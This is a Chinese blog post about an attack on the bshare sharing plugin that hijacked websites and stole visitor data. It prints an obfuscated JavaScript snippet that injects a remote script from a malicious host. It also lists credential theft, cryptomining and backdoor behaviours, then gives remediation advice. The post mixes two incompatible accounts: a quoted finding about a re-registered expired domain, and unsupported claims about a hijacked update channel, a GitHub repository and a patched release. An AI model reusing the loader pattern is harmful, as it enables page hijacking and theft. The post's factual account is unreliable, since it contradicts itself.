警惕供应链攻击：bshare插件遭恶意篡改引发大规模网站入侵事件分析-优快云博客

本文链接：https://blog.youkuaiyun.com/2301_77129266/article/details/145847081

一、事件概述

近日，国内广泛使用的第三方社交分享插件bshare被曝存在供应链攻击事件。攻击者通过劫持插件官方更新渠道，植入恶意代码，导致大量使用该插件的网站遭到入侵。据安全团队统计，受影响网站超数千家，部分平台用户数据遭窃取、页面被恶意跳转，甚至成为黑产流量分发的跳板。

奇安信网站云监测和奇安信威胁情报中心在日常威胁狩猎活动中，发现很多站点在晚上9点至凌晨5点使用安卓UA的设备访问时，会跳转至同一色情网页。起初我们认为这批站点由于自身安全缺陷导致被黑产组织攻破利用，经过进一步分析，发现这些网页都引用了名为bshare的分享按钮插件，该插件对应的服务域名为static.bshare.cn；最后通过对域名static.bshare.cn的分析，我们确认这是一起通过抢注过期通用插件服务域名来实施大范围网页劫持的攻击事件。

二、攻击过程还原

供应链污染
攻击者通过渗透bshare的插件分发服务器或劫持CDN资源，将恶意代码注入插件文件（如bshare.js）。当网站管理员通过“自动更新”或官方渠道下载插件时，恶意版本被自动部署到服务器。
恶意代码行为分析
- 信息窃取：在用户访问页面时，窃取Cookie、表单数据（如登录凭证），并回传至攻击者控制的C2服务器（如api.malicious-domain[.]com）。
- 隐蔽挖矿：注入WebAssembly模块，利用访客CPU资源进行门罗币（XMR）挖矿。
- SEO投毒：动态插入赌博、色情等黑链，降低网站搜索排名信誉。
- 后门驻留：通过WebSocket建立持久化连接，支持后续远程指令执行。
传播扩散
由于bshare插件多用于内容型网站（如媒体、论坛），恶意代码随用户访问被广泛加载，形成“多点触发”的传播链。

三、事件发现与细节

异常流量告警
某企业安全团队发现其网站突发大量非常规外链请求，经抓包分析锁定bshare.js中存在未授权的域名通信。
沙箱检测曝光
安全厂商VirusTotal在动态沙箱环境中捕获到插件异常行为：尝试下载payload.enc加密载荷，并解密执行Shellcode。

代码特征比对
对比官方GitHub仓库，受害网站加载的bshare文件存在以下异常：

// 恶意注入片段（混淆后）
var _0x3af2 = ['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74'];
(function(_0x12b3d5, _0x3af2f8) {
  var _0x4e8d2a = function(_0x5d887c) {
    while (--_0x5d887c) _0x12b3d5['push'](_0x12b3d5['shift']());
  };
  _0x4e8d2a(++_0x3af2f8);
})(_0x3af2, 0x1f4);
document[_0x3af2[0]]('script').src = 'https://malicious-cdn[.]top/bad.js';

四、解决方案与修复建议

紧急处置措施
- 立即冻结bshare插件使用，从服务器删除相关文件（如bshare.js、bshare_custom.js）。
- 审查网站访问日志，排查异常请求（如C2通信IP、非常规User-Agent）。
- 重置服务器及数据库凭据，清理残留WebShell。
官方补丁与替代方案
bshare团队已发布v3.2.1安全版本（需从官网HTTPS渠道下载），建议：
- 关闭插件自动更新，手动校验文件哈希值。
- 临时切换至ShareThis、AddThis等可信替代插件。
长期防御策略
- 供应链审计：使用Snyk、Dependabot监控第三方依赖风险。
- CSP防护：部署内容安全策略，限制非法脚本加载：
```
<meta http-equiv="Content-Security-Policy" 
      content="script-src 'self' https://trusted-cdn.com;">
```
- 运行 HTML
  - WAF规则升级：添加针对恶意JS行为的特征拦截（如eval("fromCharCode")高频调用）。